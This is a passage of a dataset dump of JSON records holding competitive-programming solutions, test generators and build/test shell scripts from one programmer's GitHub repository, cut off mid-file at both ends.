-f \"$dir/00$i\" ]; then \n break;\n fi\n cur=\"$dir/00$i\"\n else\n cur=\"$dir/0$i\"\n fi\n fi\n echo \"Test $cur\"\n $exe < $cur > $cur.out\n $checker $cur $cur.out $cur.a\n ec=$?\n rm -rf $cur.out\n #if [ $ec -eq 1 ]; then break; fi\ndone\n" }, { "alpha_fraction": 0.4602150619029999, "alphanum_fraction": 0.5483871102333069, "avg_line_length": 17.600000381469727, "blob_id": "f72e86dfd2ff7a01fc3be4dfb4f9e7784eb7dfb1", "content_id": "75b90e3834a555157293e419a420b18cf32c7f89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 95, "num_lines": 25, "path": "/CodeForce/1576/generator.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import random\nimport math\nimport sys\n\nn = 1400\nm = 15000\nc = 0\nf = 14000\ng = 4500\n\ndef genUV(n):\n u = random.randint(0, n - 1)\n while True:\n v = random.randint(0, n - 1)\n if u != v:\n return u, v\n\nprint(n, m, c, f)\nfor i in range(m):\n u, v = genUV(n)\n print(i, random.randint(0, g), u, v, random.randint(100, 1000), random.randint(1, 10 ** 5))\n\nfor i in range(f):\n u, v = genUV(n)\n print(i, u, v, random.randint(2, 12000))\n" }, { "alpha_fraction": 0.5415162444114685, "alphanum_fraction": 0.5631768703460693, "avg_line_length": 18.714284896850586, "blob_id": "23a6624f46ab5a1a1c6bd146b641b69120cf61e2", "content_id": "fe0892731046a276d8c42668390bc2ea1efd3304", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 277, "license_type": "no_license", "max_line_length": 70, "num_lines": 14, "path": "/scripts/buildHere.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nmkdir -p out\ncd out\n\nif ls ../*.pro 1> /dev/null 2>&1; then\n qmake .. && make;\nelse\n if ls ../CMakeLists.txt 1> /dev/null 2>&1; then\n cmake .. 
&& make;\n else\n echo \"No .pro and CMakeLists.txt is found, nothing to do here\"\n fi\nfi\n\n" }, { "alpha_fraction": 0.46754562854766846, "alphanum_fraction": 0.476673424243927, "avg_line_length": 13.92424201965332, "blob_id": "394844e07acbe03a293d893f6e949415652111fc", "content_id": "3ab642b628cdc9f259ca6e44d8ade023e6f9f586", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 986, "license_type": "no_license", "max_line_length": 39, "num_lines": 66, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.15/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n//compiler: MSVC 2010 (C++ obviously)\n//one template to rule them all\n\n#include <iostream>\n#include <fstream>\n#include <map>\n#include <vector>\n#include <set>\n#include <deque>\n#include <algorithm>\n\ntypedef unsigned long long ull;\ntypedef long long ll;\n\n#define FN \"test\"\n\nusing namespace std;\n\nclass why\n{\npublic:\n bool operator()(int a, int b)\n {\n return a > b;\n }\n};\n\nint main()\n{\n#ifdef LOCALZ\n ifstream in(FN \".in\");\n ofstream out(FN \".out\");\n#else\n istream &in = cin;\n ostream &out = cout;\n#endif\n int n;\n in >> n;\n\n vector<int> v;\n v.reserve(n);\n\n for(int i = 0; i < n; i++)\n {\n int a;\n in >> a;\n v.push_back(a);\n }\n\n sort(v.begin(),v.end(), why());\n\n int m = 0;\n\n for(int i = 0; i < n; i++)\n {\n if(v[i]+i > m)\n m = v[i]+i;\n }\n\n out << m + 2;\n\n#ifdef LOCALZ\n out.close();\n#endif\n return 0;\n}\n" }, { "alpha_fraction": 0.42798253893852234, "alphanum_fraction": 0.4704170823097229, "avg_line_length": 30.968992233276367, "blob_id": "e85216e1d2eea6f7b9157cf27daf2747fc4ec999", "content_id": "ee0e6447c422089cfc84f0eccb8e4a38a9db370a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4124, "license_type": "no_license", "max_line_length": 928, "num_lines": 129, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.19/J.cpp", 
"repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <math.h>\n#include <algorithm>\n#include <queue>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n#define con 100000\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"jenny\";\nstring FILEINPUT = FILENAME;\nint mx = 0;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);mx=max(mx,x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');}\n\nvi a, date, indexes;\nint n, k;\nchar s[11];\nint years[300];\nint month[13] = {31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31};\nbool is[200000];\n\nint g(int i)\n{\n return (1900 + i) / 4 == 0 && ((1900 + i) % 100) || (1900 + i) / 400 == 0;\n}\n\nint f(char s[])\n{\n int d = (s[0] - '0') * 10 + s[1] - '0',\n m = (s[3] - '0') * 10 + s[4] - '0',\n y = (s[6] - '0') * 1000 + (s[7] - '0') * 100 + (s[8] - '0') * 10 + s[9] - '0';\n y -= 1900;\n int ans = years[y] + d + (m > 2 ? g(y) : 0);\n ans += month[m];\n return ans;\n}\n\nbool cmp(int i, int j)\n{\n if (date[i] < date[j])\n return true; else\n if (date[i] > date[j])\n return false;\n else return a[i] < a[j];\n}\n\nvoid toDate(int k)\n{\n int tt = 0, count = 0;\n while (tt >= k)\n tt -= years[tt],\n count++;\n int xy = 11;\n while (tt - month[xy] < k)\n xy--;\n tt -= month[xy];\n printf(\"%d:%d:%d\\n\", tt, xy, count + 1900 - 1);\n}\n\n\nint yy[1000000], mm[1000000], dd[1000000];\nvoid run()\n{\n years[0] = 0;\n int t;\n for (int i = 1; i <= 12; i++)\n month[i] = month[i - 1] + month[i];\n for (int i = -202; i < 202; i++)\n {\n years[i + 203] = years[i - 1 + 203] + 365;\n if (g(i))\n years[i]++;\n }\n readln(n);\n for (int i = 0; i < n; i++)\n {\n scanf(\"%s\\n\", s);\n scanf(\"%s\\n\", s);\n date.pb(f(s));\n //writeln(f(s));\n is[date[i]] = true;\n readln(k);\n a.pb(k);\n indexes.pb(i);\n }\n sort(indexes.begin(), indexes.end(), cmp);\n int k = INF;\n for (int i = 0; i < n; i++)\n {\n bool f = false;\n for (int j = 0; j < a[indexes[i]]; j++)\n if (is[date[indexes[i]] - j - 1 + con])\n continue; else\n {\n is[date[indexes[i]] - j - 1 + con] = true;\n f = true;\n// writeln(date[indexes[i]] - j - 1, k);\n k = min(date[indexes[i]] - j - 1 + con, k);\n break;\n }\n if (!f)\n {\n printf(\"Impossible\\n\");\n return;\n }\n }\n toDate(k);\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" 
}, { "alpha_fraction": 0.4501347839832306, "alphanum_fraction": 0.4568733274936676, "avg_line_length": 27.5, "blob_id": "58de38aaabf252163427cc1b08264f8211295371", "content_id": "48aedf6937a42dc91e5ce1c6d8b57a70d76bc5d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 742, "license_type": "no_license", "max_line_length": 70, "num_lines": 26, "path": "/2021/vkcupMl/getRecall.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import csv\n\nanswers = './TEST/test.csv'\noutput = './TEST/submit.csv'\n\nwith open(answers, 'r') as answersFile:\n reader = csv.DictReader(answersFile)\n with open(output, 'r') as outputFile:\n tpfn = 0\n f = {}\n for row in reader:\n u = int(row['u'])\n v = int(row['v'])\n if not u in f:\n f[u] = set()\n f[u].add(v)\n tpfn += 1\n tp = 0\n for row in outputFile.readlines():\n if len(row) <= 5: continue\n u, vs = row.strip().split(': ')\n u = int(u)\n if not u in f: continue\n tp += len(set(map(int, vs.split(','))).intersection(f[u]))\n\n print(f'RECALL: {tp / tpfn:.5f}, {tp}/{tpfn}')\n\n" }, { "alpha_fraction": 0.6834611296653748, "alphanum_fraction": 0.6845564246177673, "avg_line_length": 23, "blob_id": "87142195c1f56726810dfe184ccb4968bcf1d56d", "content_id": "24eb00771e030ab65855a556602b3fdce38566a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 913, "license_type": "no_license", "max_line_length": 69, "num_lines": 38, "path": "/study/ChatNotDemo/chatdialog.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": " #ifndef CHATDIALOG_H\n #define CHATDIALOG_H\n\n #include \"ui_chatdialog.h\"\n#include \"QMessageBox\"\n#include \"QScrollBar\"\n\n class ChatDialog : public QDialog, private Ui::ChatDialog\n {\n Q_OBJECT\n\n public:\n ChatDialog(QWidget *parent = 0);\n ~ChatDialog();\n\n public slots:\n void appendMessage(const QString &from, const QString &message);\n\n private slots:\n void getMsg();\n 
void returnPressed();\n void newParticipant(const QString &nick);\n void participantLeft(const QString &nick);\n void clearHistory();\n\n private:\n void sendMsg(QString nick, QString msg);\n void showHistory();\n void printf(QColor color, QString nick, QString did);\n void logMessage(const QString &nick, const QString &message);\n QString myNickName;\n void getTime(time_t timer, char[]);\n QTextTableFormat tableFormat;\n QString localIP(int i);\n QString getUserList();\n };\n\n #endif\n" }, { "alpha_fraction": 0.5104572772979736, "alphanum_fraction": 0.5242821574211121, "avg_line_length": 29.497297286987305, "blob_id": "12ea37e93ec385063fc5451d3615485536ea5c33", "content_id": "7ef265828380f4ada417cc04b5624ccf7cad2f01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5642, "license_type": "no_license", "max_line_length": 173, "num_lines": 185, "path": "/2022/ghc/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n\n//}}}\n\nstruct project\n{\n string name;\n int d, s, b, r;\n map<string, int> skills;\n vector<string> assigned;\n vector<pair<string, int>> roles;\n\n project() {}\n};\n\nstruct human\n{\n string name;\n map<string, int> skills;\n int time = 0;\n int prevTime = 0;\n\n human() {}\n};\n\nistream& operator>>(istream& is, project& p) {\n is >> p.name >> p.d >> p.s >> p.b >> p.r;\n p.roles.resize(p.r);\n p.assigned.resize(p.r);\n fori(p.r)\n is >> p.roles[i].first >> p.roles[i].second;\n for (auto& [skill, level]: p.roles)\n p.skills[skill] = level;\n return is;\n}\n\nistream& operator>>(istream& is, human& h) {\n int n;\n is >> h.name >> n;\n string skill;\n int level;\n fori(n)\n is >> skill >> level,\n h.skills[skill] = level;\n return is;\n}\n\nvoid run()\n{\n ints(c, p);\n vector<human> humans(c);\n vector<project> projects(p);\n readln(humans, projects);\n sort(all(projects), [&](const project& a, const project& b) {\n return a.s < b.s;\n });\n int M = 10;\n for (int i = 0; i < p; i += M)\n shuffle(projects.begin() + i, projects.begin() + i + M, rng);\n shuffle(all(humans), rng);\n sort(all(humans), [&](const human& a, const human& b) {\n return a.skills.size() > b.skills.size();\n });\n map<string, int> h_by_name;\n fori(c)\n h_by_name[humans[i].name] = i;\n int maxScore = 0;\n int score = 0;\n for (auto &p: projects) {\n maxScore += p.s;\n map<string, int> cur;\n bool can = 
true;\n int b = 0;\n map<string, bool> used;\n vector<int> perm(p.r);\n iota(all(perm), 0);\n shuffle(all(perm), rng);\n\n for (int i: perm)\n {\n const auto& [skill, level] = p.roles[i];\n int bestTime = MOD;\n\n vector<int> ppp(c);\n iota(all(ppp), 0);\n //shuffle(all(ppp), rng);\n\n human& best = humans[0];\n for (int j: ppp)\n {\n human& h = humans[j];\n if (!used.contains(h.name))\n if (h.skills[skill] >= level || (h.skills[skill] + 1 == level && cur[skill] >= level))\n if (h.time < bestTime)\n bestTime = h.time,\n best = h;\n }\n can &= bestTime < MOD;\n if (!can) break;\n\n b = max(b, bestTime);\n p.assigned[i] = best.name;\n used[best.name] = true;\n for (auto& [skill, level]: best.skills)\n cur[skill] = max(cur[skill], level);\n }\n if (can)\n {\n int time = b + p.d;\n int currentScore = max(0, p.s - max(0, time - p.b));\n if (currentScore == 0) continue;\n fori(p.r)\n {\n const auto& name = p.assigned[i];\n const auto& [skill, level] = p.roles[i];\n auto& h = humans[h_by_name[name]];\n h.time = time;\n if (h.skills[skill] <= level)\n h.skills[skill]++;\n }\n writeln(p.name);\n writeln(p.assigned);\n score += currentScore;\n }\n }\n cerr << score << \" / \" << maxScore << endl;\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\" \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti 
istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.36016950011253357, "alphanum_fraction": 0.38983049988746643, "avg_line_length": 15.857142448425293, "blob_id": "56a7cd2272542f840924e26665e850fc7116fc2d", "content_id": "644b966c9bfa88622b2da7b1f2823176a2c92b24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 236, "license_type": "no_license", "max_line_length": 27, "num_lines": 14, "path": "/2017/newYear/L.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "s = list(input())\ncarry = True\nl = len(s)\nfor i in range(l):\n if s[l - i - 1] != '0':\n s[l - i - 1] = '0'\n else:\n s[l - i - 1] = '1'\n carry = False\n break\n\nif carry:\n s = ['1'] + s\nprint(''.join(s))\n" }, { "alpha_fraction": 0.444029837846756, "alphanum_fraction": 0.46641790866851807, "avg_line_length": 18.14285659790039, "blob_id": "0e35066758e4b70d098beb53e63137ced962e7b2", "content_id": "5808759dc3e18820682e255b624a17f2c37e9682", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 268, "license_type": "no_license", "max_line_length": 51, "num_lines": 14, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.17/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "f = open(\"input.txt\", \"r\")\nn = int(f.readline())\nx = {'Emperor Penguin': 0, 'Macaroni Penguin': 0, 'Little Penguin': 0}\nfor i in range(n):\n x[f.readline()[:-1]] += 1\n\nmx = -1\nans = ''\nfor y in x:\n if x[y] > mx:\n mx = x[y]\n ans = y\n\nopen(\"output.txt\", \"w\").write(ans)\n" }, { "alpha_fraction": 0.45697712898254395, "alphanum_fraction": 0.467934250831604, "avg_line_length": 25.75, "blob_id": "ff01e9db9f6d2975720acd797a2a71edfe6f63e5", "content_id": "f3972a0d14cb9f30ea0245e8d74e795c7a4ab105", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3103, "license_type": "no_license", "max_line_length": 96, "num_lines": 116, "path": "/CodeForce/1489/G.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.collections.*// }}}\n\nclass DSU(n: Int) {\n\n private var a = IntArray(n)\n private var sz = IntArray(n) { 1 }\n\n init {\n for (i in a.indices) a[i] = i\n }\n\n fun get(i: Int): Int {\n return if (a[i] == i)\n i\n else {\n a[i] = get(a[i]);\n a[i]\n }\n }\n\n fun union(i: Int, j: Int): Boolean {\n var l = get(i)\n var r = get(j)\n if (l == r) return false\n if (sz[l] > sz[r]) {\n val t = l\n l = r\n r = t\n }\n sz[r] += sz[l]\n a[l] = r\n return true\n }\n}\n\nprivate fun run() {\n val (n, m) = readln()\n val a = readLine()!!.split(\" \").map { it.toLong() }.zip(0..n).sortedBy { it.first }\n val b = Array(m) {\n val x = readLine()!!.split(\" \").map { it.toLong() }\n Triple(x[0].toInt() - 1, x[1].toInt() - 1, x[2])\n }.sortedBy { it.third }\n var ans = 0L\n val d = DSU(n)\n var j = 0\n for (i in 1 until n) {\n val first = d.get(a[0].second)\n val second = d.get(a[i].second)\n if (first == second) continue\n while (j < m && b[j].third <= a[0].first + a[i].first) {\n if (d.union(b[j].first, b[j].second))\n ans += b[j].third\n ++j\n }\n if (d.union(a[0].second, a[i].second))\n ans += a[0].first + a[i].first\n }\n writeln(ans)\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n// val (t) = readln()\n val t = 1\n for (q in 1..t) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { 
readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.5054455399513245, "alphanum_fraction": 0.5133663415908813, "avg_line_length": 32.11475372314453, "blob_id": "2e2bbbb5e88d20991af89d1927c837b35de38c9b", "content_id": "a869c3efb62246407286349f4a36f73ff9123639", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2020, "license_type": "no_license", "max_line_length": 928, "num_lines": 61, "path": "/CodeForce/0347/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"a\";\nstring FILEINPUT = FILENAME;\nbool ONLINE_JUDGE = false;\nvector<int> a;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int 
d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');\n}\n\nvoid run()\n{\n int n;\n readln(n);\n readln(a, n);\n int count = 1;\n bool f = false;\n for (int i = 0; i < n; i++)\n if (a[i] == i)\n count++; else\n if (a[a[i]] == i)\n f = true;\n printf(\"%d\\n\", min(n, count + f));\n}\n\nint main()\n{\n //ONLINE_JUDGE = true;\n if (ONLINE_JUDGE)\n {\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n }\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.46268656849861145, "alphanum_fraction": 0.49253731966018677, "avg_line_length": 66, "blob_id": "c5b65a6b04f903c1761e02e068f58cebdf981ff2", "content_id": "cbb8b41cf6679d97cf265e0385bb469f1449f53d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 67, "license_type": "no_license", "max_line_length": 66, "num_lines": 1, "path": "/CodeForce/0784/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print(''.join('>'+'+'*(48+int(x))+'.'for x in str(eval(input()))))\n" }, { "alpha_fraction": 0.36666667461395264, "alphanum_fraction": 0.44999998807907104, "avg_line_length": 29, "blob_id": "5d6240c9b7cd8128aec4c8a154aab0e472f0492d", "content_id": "6b3db6924688866af676af29cf9602dae1405146", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 60, "license_type": "no_license", "max_line_length": 42, "num_lines": 2, "path": "/CodeForce/0617/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nprint((n // 5) + (1 if n % 5 != 0 else 0))\n" }, { "alpha_fraction": 0.32846716046333313, "alphanum_fraction": 0.36496350169181824, "avg_line_length": 17.266666412353516, "blob_id": "7f3060c6961ed42b6a061321bc67827518b450cb", "content_id": "d992d49595a33eb7299f39961698337e15bb272e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 274, "license_type": "no_license", "max_line_length": 40, 
"num_lines": 15, "path": "/CodeForce/0513/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "[n, m] = list(map(int, input().split()))\na = [0] * n\nl = 0\nr = n\nm -= 1\nfor i in range(1, n + 1):\n deg = 1 << max(n - i - 1, 0)\n if m >= deg:\n m -= deg\n r -= 1\n a[r] = i\n else:\n a[l] = i\n l += 1\nprint(' '.join(str(x) for x in a))\n" }, { "alpha_fraction": 0.4566611051559448, "alphanum_fraction": 0.47686734795570374, "avg_line_length": 25.87640380859375, "blob_id": "5c3261feaaf16f74fd9f6cd7a49435416db64cff", "content_id": "79b69f3344ffbd303eef0e7fa4e8ee1d1db09a7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7176, "license_type": "no_license", "max_line_length": 174, "num_lines": 267, "path": "/2020/yaTest/Fnow.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ninline bool inside(int lx, int ly, int rx, int ry, int x, int y)\n{\n return lx <= x && x < rx && ly <= y && y < ry;\n}\n\nstatic const int N = 1048576;\nstatic const int R = 16;\nstatic const int CCC = int(N * 1.33) + 100;\nint w = 0;\n\nstruct quadro\n{\n set<pii> points;\n int lx, ly, sz;\n int i = 0;\n\n quadro() {}\n quadro(int lx, int ly, int sz): lx(lx), ly(ly), sz(sz) {\n w++;\n }\n\n void init(int lx, int ly, int sz)\n {\n this->lx = lx;\n this->ly = ly;\n this->sz = sz;\n }\n\n void insert(int x, int y);\n void erase(int x, int y);\n pii get(int left, int down, int right, int up);\n};\n\nquadro Q[CCC];\nint ii[CCC][16];\n\nvoid quadro::insert(int x, int y)\n{\n //writeln(\"Adding\", x, y, \"to\", lx, ly, sz); cout.flush();\n\n auto create = [&](const int& index, int x, int y, int lx, int ly) {\n if (ii[i][index] == -1)\n {\n ii[i][index] = w++;\n Q[ii[i][index]].init(lx, ly, sz / 4);\n Q[ii[i][index]].i = ii[i][index];\n }\n Q[ii[i][index]].insert(x, y);\n };\n\n auto iii = [&](const int& x, const int& y) {\n int ix = (x - lx) / sz;\n int iy = (y - ly) / sz;\n int index = ix * 4 + iy;\n create(index, x, y, lx + ix * sz, ly + iy * sz);\n };\n\n if (points.size() == R)\n for (const auto& [yy, mxx]: points)\n iii(-mxx, yy);\n if (points.size() >= R)\n iii(x, y);\n points.emplace(y, -x);\n}\n\nvoid quadro::erase(int x, int y)\n{\n points.erase({y, -x});\n\n auto create = [&](const int& index) {\n if (ii[i][index] != -1) {\n Q[ii[i][index]].erase(x, y);\n if (Q[ii[i][index]].points.size() == 0)\n ii[i][index] = -1;\n }\n };\n int ix = (x - lx) / sz;\n int iy = (y - ly) / sz;\n int index = ix * 4 + iy;\n create(index);\n}\n\n\npii quadro::get(int 